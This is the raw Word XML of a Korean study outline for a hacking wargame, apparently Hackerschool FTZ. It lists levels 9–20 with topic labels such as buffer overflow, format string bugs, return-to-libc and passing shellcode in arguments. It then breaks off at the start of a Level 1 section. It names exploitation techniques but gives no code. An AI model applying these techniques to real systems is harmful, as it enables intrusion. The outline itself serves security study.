          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E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>level9</w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00640042" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">[버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A134E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>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A134E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>스택할당</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve"> 방식, 표준입력]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A134E" w:rsidRPr="009A134E" w:rsidRDefault="00640042" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">level10 </w:t>
      </w:r>
      <w:r w:rsidR="009A134E" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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>[공유 메모리]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A134E" w:rsidRDefault="009A134E" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">level11 </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">포맷 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>스트링</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 버그</w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A134E" w:rsidRDefault="009A134E" w:rsidP="009A134E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A134E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 xml:space="preserve">level11 </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A134E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>[</w:t>
      </w:r>
      <w:r w:rsidR="002E42C5">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002E42C5">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A134E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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E42C5" w:rsidRPr="009A134E" w:rsidRDefault="002E42C5" w:rsidP="009A134E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">level11  [버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00150825">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00150825">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>쉘코드를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 인자에</w:t>
      </w:r>
      <w:r w:rsidR="00C95E02">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 직접 포함시켜 </w:t>
      </w:r>
      <w:r w:rsidR="00633CFE">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A134E" w:rsidRDefault="00AC209B" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC209B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 xml:space="preserve">level12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC209B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 xml:space="preserve">[버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC209B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>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC209B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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F591E" w:rsidRDefault="009F591E" w:rsidP="00645C86">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F591E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 xml:space="preserve">level13 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F591E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 xml:space="preserve">[버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F591E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>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>스택</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가드</w:t>
      </w:r>
      <w:r w:rsidR="00556F43">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00556F43" w:rsidRDefault="00556F43" w:rsidP="00556F43">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556F43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 xml:space="preserve">level14 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00556F43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 xml:space="preserve">[버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00556F43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>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>, 루틴 분기 조작</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F43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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00556F43" w:rsidRDefault="000517E8" w:rsidP="000517E8">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000517E8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>level15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000517E8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 xml:space="preserve"> [버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000517E8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>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>하드코딩된</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 데이터 이용 분기 조작</w:t>
      </w:r>
      <w:r w:rsidRPr="000517E8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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000517E8" w:rsidRDefault="00BF3BB8" w:rsidP="000517E8">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BB8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 xml:space="preserve">level16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3BB8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 xml:space="preserve">[버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF3BB8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>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>, 함수 포인터 조작</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3BB8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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D52D84" w:rsidRDefault="00D52D84" w:rsidP="00D52D84">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r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>level1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3BB8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b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3BB8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 xml:space="preserve">[버퍼 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF3BB8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>오버플로우</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>, 함수 포인터 조작</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3BB8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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BB8" w:rsidRDefault="00E61A99" w:rsidP="000517E8">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E61A99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>level18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E61A99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 xml:space="preserve"> [포인터 변수 조작 메모리 변조]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61A99" w:rsidRDefault="005E657D" w:rsidP="000517E8">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E657D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 xml:space="preserve">level19 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E657D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>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E657D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 xml:space="preserve">Return To </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E657D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>Libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E657D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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C5144A" w:rsidRDefault="00052E7C" w:rsidP="0040417D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052E7C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 xml:space="preserve">level20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052E7C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 xml:space="preserve">[포맷 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00052E7C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>스트링</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006034A8">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 버그</w:t>
      </w:r>
      <w:r w:rsidRPr="00052E7C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>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040417D" w:rsidRDefault="0040417D" w:rsidP="0040417D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Level 1. </w:t>
      </w:r>
      <w:r w:rsidR="00B27A1F" w:rsidRPr="009A134E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>[find 명령어 사용법, 특수권한 비트 개념, file descriptor]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00720566" w:rsidRDefault="001E07BC" w:rsidP="0040417D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00B47D91">
        <w:rPr>
